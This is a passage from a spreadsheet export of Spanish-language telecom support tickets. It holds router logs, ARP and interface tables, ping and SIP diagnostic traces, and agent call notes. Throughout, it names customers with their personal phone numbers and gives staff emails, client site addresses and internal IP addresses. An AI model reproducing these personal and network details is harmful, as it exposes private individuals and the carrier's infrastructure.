    BUFFER LOGGING:  LEVEL DEBUGGING, 25 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 28 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*JAN  2 00:00:02.259: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*JUN  6 17:52:09.123: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*JUN  6 17:52:30.891: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  6 17:52:30.895: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN  6 17:52:31.767: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*JUN  6 17:52:31.891: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  6 17:52:31.895: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN  6 17:52:36.003: %CELLWAN-2-SIM_FAILURE: [CELLULAR0/1/0]: SIM READ FAILED
*JUN  6 17:52:36.075: %CELLWAN-2-MODEM_UP: MODEM IN HWIC SLOT 0/1 IS NOW UP
*JUN  6 17:52:36.083: %USBFLASH-5-CHANGE: USBFLASH0 HAS BEEN INSERTED!
*JUN  6 11:52:38.579 GUA: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 17:52:38 UTC MON JUN 6 2022 TO 11:52:38 GUA MON JUN 6 2022, CONFIGURED FROM CONSOLE BY CONSOLE.
*JUN  6 11:52:38.719 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*JUN  6 11:52:39.619 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*JUN  6 11:52:40.627 GUA: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN  6 11:52:40.699 GUA: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN  6 11:52:40.699 GUA: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN  6 11:52:40.699 GUA: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0/2, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN  6 11:52:40.699 GUA: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0/3, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN  6 11:52:41.631 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*JUN  6 11:52:41.735 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*JUN  6 11:52:41.735 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO DOWN
*JUN  6 11:52:41.735 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/2, CHANGED STATE TO DOWN
*JUN  6 11:52:41.735 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/3, CHANGED STATE TO DOWN
*JUN  6 11:52:42.699 GUA: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.3(3)M3, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED WED 28-MAY-14 05:26 BY PROD_REL_TEAM
*JUN  6 11:52:42.743 GUA: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_GMG_GT_Z2_SAN_PEDRO_SACATEPEQUEZ IS UNDERGOING A COLD START
CC_GMG_GT_Z2_SAN_PEDRO_SACATEPEQUEZ#
SHOW CLOCK
*00:46:47.323 GUA THU JUN 16 2022
CC_GMG_GT_Z2_SAN_PEDRO_SACATEPEQUEZ#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.174.141.113          0   B443.2600.D9AD  ARPA   GIGABITETHERNET0/0
INTERNET  10.174.141.117          -   881D.FC28.E1A0  ARPA   GIGABITETHERNET0/0
INTERNET  186.151.253.197         -   881D.FC28.E1A1  ARPA   GIGABITETHERNET0/1
INTERNET  186.151.253.198         0   0C8D.DBAF.D37B  ARPA   GIGABITETHERNET0/1
CC_GMG_GT_Z2_SAN_PEDRO_SACATEPEQUEZ#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/313900305/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
GI0/0/0                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/0/1                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/0/2                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/0/3                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
CE0/1/0                        UP             UP
CE0/1/1                        DOWN           DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            DOWN           DOWN
CC_GMG_GT_Z2_SAN_PEDRO_SACATEPEQUEZ#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.174.141.117  YES NVRAM  UP                    UP
GIGABITETHERNET0/1         186.151.253.197 YES NVRAM  UP                    UP
GIGABITETHERNET0/0/0       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0/1       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0/2       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0/3       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
CELLULAR0/1/0              UNASSIGNED      YES UNSET  UP                    UP
CELLULAR0/1/1              UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5                  10.212.159.13   YES NVRAM  UP                    UP
VLAN1                      UNASSIGNED      YES UNSET  DOWN                  DOWN
CC_GMG_GT_Z2_SAN_PEDRO_SACATEPEQUEZ#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_METRO 10.174.141.117
  PING 10.174.141.117: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.174.141.117 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.14
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_METRO 10.174.141.117
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_METRO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
 10.174.141.117/32  DIRECT  0    0                 0.0.0.0         VLANIF2205			</t>
  </si>
  <si>
    <t>F4603721</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE MICHELLE LOZANO 75404229-70268075 QUIEN SE ENCUENTRA UBICANDO LOS EQUIPOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN INGRESA LA LLAMADA
##LLAMAD DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MICHELLE LOZANO 75404229 PARASOLICITAR DATOS DE VISITA
-ID 3001477035
NOMBRE DEL CLIENTE: ALBA PETROLEOS DE EL SALVADOR S.E M DE C.V
UBICACIÓN:BOULEVARD LAS PALMERAS #3 SONSACATE SONSONATE "HOSPITAL CENTRO DE CIRUGIA DE SONSONATE" ( FRENTE A SUDEM)
CONTACTO EN SITIO:  MICHELLE LOZANO 75404229
HORARIO DE ATENCION:27/4
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>CLIENT INDICA QUE NO SE ENCUENTRA EN LAS INSTALACIONES, INDICA QUE VA EN CAMINO SOLICITA LLAMADA NUEVAMENTE EN 20 MIN
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE MICHELLE LOZANO 75404229-70268075 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE EN PUNTO MICHELLE VALIDA TANTO EL SERVICIO DE INTERNET COMO EL DE TELEFONIA RESTABLECIDO
SE PROCEDE CON EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4603723</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MICHELLE LOZANO 75404229  INDICA QUE YA SE ENCUNTRA EN EL SITIO Y QUE SI CUENTAN CON ENERGIA || SE NOTIFICA A GESTOR **
-ID 3001472624
**</t>
  </si>
  <si>
    <t>F4603725</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MICHELLE LOZANO AL 75404229 INDICA QUE LE LLAMARON DE CLARO Y QUE REALIZARON PRUEBAS REINICIARON EQUIPOS PERO NO LEVANTA EL SERVICIO | SE NOTIFICA A GESTOR **
-ID 3001473283
**</t>
  </si>
  <si>
    <t>F4603734</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 00 525551745299 PARA CONSULTAR SI AÚN VEN DOWN SERVICIO, NO CONTESTA; SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE; SE PIDE APOYO VÍA CORREO:
ASUNTO: RE: SOLICITUD DE SOPORTE ::: BIMBO INTERNACIONAL - GB BH OLANCHO - G74-M00004HN-HN0450F-NP-(70022OH) - LINK DOWN || IMBBL004307</t>
  </si>
  <si>
    <t>F4603775</t>
  </si>
  <si>
    <t>CLIENTE YADIRA GALINDO 31860427 VALIDA QUE EL SERVICIO YA SE ENCUENTRA EN FUNCIONAMIENTO,  SE LE COMENTA QUE SE ESTÁ COORDINANDO CON INGENIERÍA LA VIABILIDAD PARA LA MIGRACIÓN DE LA TECNOLOGIA ACTUAL HACIA SIP, YA QUE EL SERVICIO ESTÁ PRESENTANDO INCONVENIENTE CONSTANTES, SE LE INDICA QUE TENTATIVAMENTE SERÍA PARA LA SIGUIENTE SEMANA, QUEDA PENDIENTE QUE INGENIERÍA CONFIRME FECHA PARA COORDINAR UNA VISITA TECNICA Y REALIZAR EL CAMBIO. CLIENTE ENTERADA. AUTORIZA EL CIERRE DEL CASO.
ID DE LLAMADA: 3001544979</t>
  </si>
  <si>
    <t>SE LE INFORMA A CLIENTE YADIRA 31860427 PARA QUE VALIDA EL FUNCIONAMIENTO, SOLICITA SE LE LLAME EN 15 MINUTOS. ID: 3001497091</t>
  </si>
  <si>
    <t>F4603791</t>
  </si>
  <si>
    <t>**SE LLAMA A DUNIA SUAZO  50431555814 NO RESPONDE || ENVIA A BUZON SE INTENTARA LUEGO **
-ID 3001562949
**</t>
  </si>
  <si>
    <t>SE LLAMA A DUNIA SUAZO 50431555814 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001503578</t>
  </si>
  <si>
    <t>**SE LLAMA A DUNIA SUAZO  50431555814 NO RESPONDE || ENVIA A BUZON SE INTENTARA LUEGO **
-ID 3001532285
**</t>
  </si>
  <si>
    <t>F4603822</t>
  </si>
  <si>
    <t>SE LE INDICA AL CLIENTE  JULIO LOPEZ QUE EL TECNICO EDWIN ARAGON LLEGARÁ EN 30 O 40 MINUTOS, SE DA POR ENTERADO Y CONFIRMA DE RECIBIDO EL CORREO.
3001528839
COLA:
NOMBRE: A: 57601405
NÚMERO: 57601405
DURACIÓN: 0:00:02
ESTADO: MARCANDO
DETALLES: 57601405
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 16/06/2022 10:39:54</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO AL CLIENTE CON LOS DATOS Y DONDE TIENE EL PROBLEMA CON SU PBX.
RE: CASO: SD1135605 /// COMPAÑIA INDUSTRIAL CORRUGADORA GUATEMALA,S.A. /// 7952-8500
¿
TRADUCIR MENSAJE A: ESPAÑOL | NO TRADUCIR NUNCA DE: INGLÉS
ESVIN ANTONIO PAREDES SAMUY
ESTIMADO CLIENTE, SE VALIDÓ LA SIGUIENTE INFORMACIÓN:
CON EL EMULADOR ZOIPER COMPLETA LA LLAMADA DE MANERA CORRECTA, EL INVITE QUE NOS ENVIA ES:
FORMA CORRECTA EN LA QUE TIENE QUE ENVIAR EL INVITE
INVITE SIP:49013999@10.197.0.87;TRANSPORT=UDP SIP/2.0
VIA: SIP/2.0/UDP 10.72.252.214:5060;BRANCH=Z9HG4BK-D8754Z-360BE1CBEB607C0D-1---D8754Z-
MAX-FORWARDS: 70
CONTACT: &lt;SIP:79528500@10.72.252.214:5060;TRANSPORT=UDP&gt;
TO: &lt;SIP:49013999@10.197.0.87;TRANSPORT=UDP&gt;
FROM: "79528500"&lt;SIP:79528500@10.197.0.87;TRANSPORT=UDP&gt;;TAG=B518A576
CALL-ID: YJI2ODY0MZA3YZFIZGFIMWU1ODG5MME1NMEZYJBIMTK.
CSEQ: 1 INVITE
ALLOW: INVITE, ACK, CANCEL, BYE, NOTIFY, REFER, MESSAGE, OPTIONS, INFO, SUBSCRIBE
CONTENT-TYPE: APPLICATION/SDP
SUPPORTED: REPLACES, NOREFERSUB, EXTENDED-REFER, TIMER, X-CISCO-SERVICEURI
USER-AGENT: ZOIPER FOR WINDOWS 2.43 R24984
ALLOW-EVENTS: PRESENCE, KPML
CONTENT-LENGTH: 329
CON SU PBX EN LAS PRUEBAS ANTERIORMENTE ENVIADAS SE OBSERVA:
FORMA EN LA QUE ESTAMOS RECIBIENDO EL INVITE CON EL +502 DE SU PBX
INVITE SIP:55874834@IMSHWI.CLARO.COM.GT SIP/2.0
VIA: SIP/2.0/UDP 10.72.252.214:5060;BRANCH=Z9HG4BKS412A7E28F;RPORT
MAX-FORWARDS: 70
CALL-ID: 59D2B8F8-06515D2A9E8F181E338A0080F098C968@10.72.252.214
FROM: "RICARDO ARGUMEDO" &lt;SIP:+50279528500@IMSHWI.CLARO.COM.GT&gt;;TAG=1365443241
TO: &lt;SIP:55874834@IMSHWI.CLARO.COM.GT&gt;
CSEQ: 1 INVITE
ALLOW: INVITE,ACK,CANCEL,BYE,PRACK,INFO,UPDATE,OPTIONS,REGISTER,NOTIFY
SUPPORTED: TIMER,100REL
USER-AGENT: PANASONIC-MPR12-V009.00013/VSIPGW-V3.0000
CONTACT: &lt;SIP:79528500@10.72.252.214:5060&gt;
P-PREFERRED-IDENTITY: "RICARDO ARGUMEDO" &lt;SIP:+50279528500@IMSHWI.CLARO.COM.GT&gt;
PRIVACY: NONE
SESSION-EXPIRES: 600
CONTENT-TYPE: APPLICATION/SDP
CONTENT-LENGTH: 268
CUANDO QUITO EL 502 EN SU PBX SIGUE ENVIANDO EL +
INVITE SIP:55874034@IMSHWI.CLARO.COM.GT SIP/2.0
VIA: SIP/2.0/UDP 10.72.252.214:5060;BRANCH=Z9HG4BKS6CA42F3BF;RPORT
MAX-FORWARDS: 70
CALL-ID: 59F6D2B6-B8515D2A8FC2F91F348A0080F098C968@10.72.252.214
FROM: "RICARDO ARGUMEDO" &lt;SIP:+79528500@IMSHWI.CLARO.COM.GT&gt;;TAG=211026293
TO: &lt;SIP:55874034@IMSHWI.CLARO.COM.GT&gt;
CSEQ: 1 INVITE
ALLOW: INVITE,ACK,CANCEL,BYE,PRACK,INFO,UPDATE,OPTIONS,REGISTER,NOTIFY
SUPPORTED: TIMER,100REL
USER-AGENT: PANASONIC-MPR12-V009.00013/VSIPGW-V3.0000
CONTACT: &lt;SIP:79528500@10.72.252.214:5060&gt;
P-PREFERRED-IDENTITY: "RICARDO ARGUMEDO" &lt;SIP:+79528500@IMSHWI.CLARO.COM.GT&gt;
PRIVACY: NONE
SESSION-EXPIRES: 600
CONTENT-TYPE: APPLICATION/SDP
CONTENT-LENGTH: 268
EL CONTACT SI SE ENVIA DE FORMA CORRECTA, EL PROBLEMA ES EN EL FROM
SALUDOS.</t>
  </si>
  <si>
    <t>EN CONFERENCIA CON JORGE CHAVARRIA  Y CLIENTE  JULIO LOPEZ
3001563106
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 5490
DURACIÓN: 0:14:28
ESTADO: CONECTADA
DETALLES: 5490
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 16/06/2022 12:25:56</t>
  </si>
  <si>
    <t>F4603842</t>
  </si>
  <si>
    <t>CLIENTE GERMAN OCHOA  LLAMA DEL 41047432 ID 3001618976 PARA EL SEGUIMIENTO DEL CASO SD1135609 SE LE INFORMA QUE ES NECESARIO REALIZAR PRUEBAS SE TRANSFIERE CON EL GESTOR A CARGO DARWINH.ESPANA AL 8126 ID 3001619725 ATIENDE MARLON RAMOS Y SE LE SOLICITA APOYO, SE DEJA CON EL GESTOR  QUIEN BRINDARA EL SOPORTE A LA ESPERA DE LOS AVANCES.</t>
  </si>
  <si>
    <t>F4603846</t>
  </si>
  <si>
    <t xml:space="preserve"> SRTA. LUCRECIA SANDOVAL 50181285 REALIZO PRUEBAS APLICO REINICIO A SUS EQUIPOS LAN, PERO INFORMA QUE ENLACE NO REESTABLECE, SOLICITA APOYO YA QUE DESCONOCE DE LOS EQUIPOS, SE LE SOLICITA CONECTAR UNA PC PARA VALIDAR LA CONEXION HACIA INTERNET PERO INDICA QUE HAY MUCHOS CABLES Y DESCONOCE COMO REALIZAR ESE PROCEDIMIENTO, SE LE SOLICITA LLAMAR A SU SOPORTE IT PERO DESCONOCE QUIEN LE ADMINISTRA SOPORTE.</t>
  </si>
  <si>
    <t>SE LLAMA SRTA. LUCRECIA SANDOVAL 50181285 ACTUALMENTE EN LLAMADA ....</t>
  </si>
  <si>
    <t>ENLACE OPERATIVO Y ESTABLE, SE VALIDARA CON CLIENTE...
CC_ASOCIACION_AMIGAS_SVICENTE_GT_INTERNET_7AVENIDA_ZONA1#PING 8.8.8.8 SOURCE VLAN 1 RE 3000 DF-BIT
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 3000, 100-BYTE ICMP ECHOS TO 8.8.8.8, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 190.149.7.225
PACKET SENT WITH THE DF BIT SET
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (3000/3000), ROUND-TRIP MIN/AVG/MAX = 28/28/40 MS</t>
  </si>
  <si>
    <t>F4603853</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KARLA 88407276 MENCIONA QUE NO HAN PRESENTADO PROBLEMAS DE ENERGIA, EL INCONVENIENTE SOLO ES CON ALGUNAS PC, CLIENTE CONFIRMA QUE ALGUNAS PC SI TIENEN SERVICIO
SE LE INFORMA QUE DEBE VALIDAR CON SU IT
-ID 3001492395</t>
  </si>
  <si>
    <t>F4603858</t>
  </si>
  <si>
    <t>JAIRO SANTIZO 54747362 (CLIENTE) NO RESPONDE, SE LLAMARA LUEGO -*
3001628248
3001628441</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE HA AGREGA A EJECUTIVOS DE CUENTA
DE: CARLOS EDGARDO ICHEL ESCOBAR
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 14:51
PARA: NOCSE@MP.GOB.GT &lt;NOCSE@MP.GOB.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; FRANCISCO DAVID LOPEZ GIL &lt;FRANCISCOD.LOPEZ@CLARO.COM.GT&gt;; JORGE DANIEL GONZALEZ MOLINA &lt;JORGED.GONZALEZ@CLARO.COM.GT&gt;
ASUNTO: F4603858 || 758500102T || MINISTERIO PUBLICO MP55 TOTONICAPAN
BUENAS TARDES APRECIABLE CLIENTE,
LE COMENTAMOS QUE SE REALIZÓ VISITA TECNICA EL DIA DE HOY, SE PROCEDIÓ A REEMPLAZAR EQUIPO ROUTER  POR UN TELDAT VLA2, ADICIONAL A ELLOS SE CAMBIÓ PATCHCORD DE FIBRA ÓPTICA, LOS NIVELES DE FIBRA SON LOS CORRECTOS.
SE OBSERVA ALTO CONSUMO EN SU RED LAN, LES COMPARTIMOS LA TABLA ARP DE LOS EQUIPOS ASOCIADOS A LA RED LAN, COMO SUGERENCIA LE RECOMENDAMOS AMPLIAR SU ANCHO DE BANDA TOMANDO EN CUENTA LA CANTIDAD DE USUARIOS QUE UTILIZAN LA RED, SOLICITAMOS SU VALIDACIÓN Y CONFIRMARNOS CIERRE DEL CASO.
DIRECCION: UBICACIÓN:MP55 - FISCAL DISTRITAL DE TOTONICAPAN - 7A. CALLE 8-40 ZONA 3, TOTONICAPAN, TOTONICAPAN
ID: 758500102T</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MELVIN 54891453 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001696454</t>
  </si>
  <si>
    <t>SE LLAMO NUEVAMENTE A CLIENTE PARA REALIZAR PRUEBAS SIN EMBARGO NO RESPONDE ENVIA A BUZPN--</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAIRO SANTIZO 54747362 MENCIONA QUE AUN NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA EN 15 MIN
-ID 3001607347</t>
  </si>
  <si>
    <t>F4603866</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE XOCHIL DE DIAZ 71846002  - 71800968 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001737039 - 3001737542</t>
  </si>
  <si>
    <t>SE LLAMA A XOCHIL DE DIAZ 71800968, PERSONA QUE REPORTA INDICA QUE ELLA LLEGA HASTA LAS 8:20, SE CONTACTARÁ A ESA HORA. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
